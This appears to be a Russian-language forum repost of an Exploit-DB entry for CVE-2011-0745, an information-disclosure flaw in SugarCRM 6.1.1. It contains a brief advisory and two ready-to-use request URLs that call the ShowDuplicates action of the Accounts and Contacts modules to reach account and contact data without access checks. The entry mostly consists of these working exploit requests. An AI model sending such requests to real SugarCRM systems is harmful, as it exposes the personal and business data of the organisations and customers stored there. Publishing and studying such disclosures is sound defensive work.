Exploit SugarCRM 6.1.1 - Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35467
Проверка EDB
  1. Пройдено
Автор
REDTEAM PENTESTING GMBH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2011-0745
Дата публикации
2011-03-15
Код:
source: https://www.securityfocus.com/bid/46885/info

SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 


http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates

http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates
 
Источник
www.exploit-db.com

Похожие темы